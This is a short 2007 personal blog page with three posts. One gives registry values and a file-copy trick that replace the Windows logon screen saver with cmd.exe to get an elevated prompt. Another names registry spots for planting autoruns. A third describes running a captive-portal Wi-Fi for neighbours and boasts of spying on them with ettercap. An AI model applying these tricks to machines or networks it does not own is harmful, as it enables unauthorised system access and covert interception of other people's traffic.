KellyKeeton dot Com v3.0 reverse engineering life

29Apr/070

elevated command line

a simple trick to get elevated command line from the screen saver, there are manyways to enter this data one fast trick is to use a linuxreg editor its simple as making the logon script the command window. alsoworks to do a command line of “copy cmd.exe logon.scr” this will work anywhere but on domain controllers not booted in recovery mode. This is preventable with PGP diskencryption.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="15"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"

OEM data you changed

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="C:\\WINDOWS\\System32\\logon.scr"

29Apr/070

windows reg tricks

in recent hackings I came across a few other locations that if smart you can injectautoruns

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

 

Filed under: Microsoft No Comments
29Apr/070

nifty firewall software and captive portal

So I have never really liked wireless networks, also if I do have wireless I liketo have free wireless. So today I spent 8 hours working on making a new wireless networkwith a captive portal. Whatis this you ask? You know when you use the wifi at a hotel it makes you agree to termsand conditions? and you cant browse until you accept them. thats the idea. I lookedall over at like 15 solutions. Mainly the biggest being free, also that I didnt needto use services 3rd party and I didnt want it to be a windows application (dont wantto use a loud computer) I happen to have a old firewall that the OS was corrupt onfrom work so I went to compusa and bought a CF card for 40% off. came home and installedmy new os. I chose to go with http://www.pfsense.org/ itsa spinoff of m0n0wall which is a very good firewall,however PFSence, has a better polish.

So after diggin out a old netgear I got it all hooked up, now I have port level fwdwith packet shape and vlans, as well as a firewalled limited wifi with captive portal.way cool I now offer network service to my neighbors with the added cost of lettingme spy on them. All ettercap I love you. The only interesting that I should add isim using a alpha build and its very buggy  but still works.

 

Filed under: Hardware, Linux No Comments